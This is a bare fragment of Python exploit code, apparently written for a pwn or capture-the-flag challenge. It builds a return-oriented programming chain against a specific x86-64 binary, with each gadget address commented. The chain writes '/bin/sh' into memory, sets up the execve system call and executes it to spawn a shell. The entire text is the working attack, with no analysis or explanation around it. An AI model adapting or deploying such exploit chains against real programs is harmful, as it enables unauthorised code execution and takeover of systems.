payload = p64(0x402c15)
#0x0000000000402c15: pop rbx; pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x46f0ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x402c15)
# 0x0000000000402c15: pop rbx; pop rbp; ret; 
payload += p64(0x68662f)+p64(0x46f0b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x46f1f7)+p64(0x40627c)
# 0x000000000040627c: mov eax, edi; add rsp, 0x10; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x42c648)
# 0x000000000042c648: pop rdx; std; dec dword ptr [rax - 0x77]; ret; 
payload += p64(0x0)+p64(0x40432c)
# 0x000000000040432c: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x3b)+p64(0x40627c)
# 0x000000000040627c: mov eax, edi; add rsp, 0x10; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x46f070)+p64(0x404bdd)
# 0x0000000000404bdd: syscall; 
payload += b''
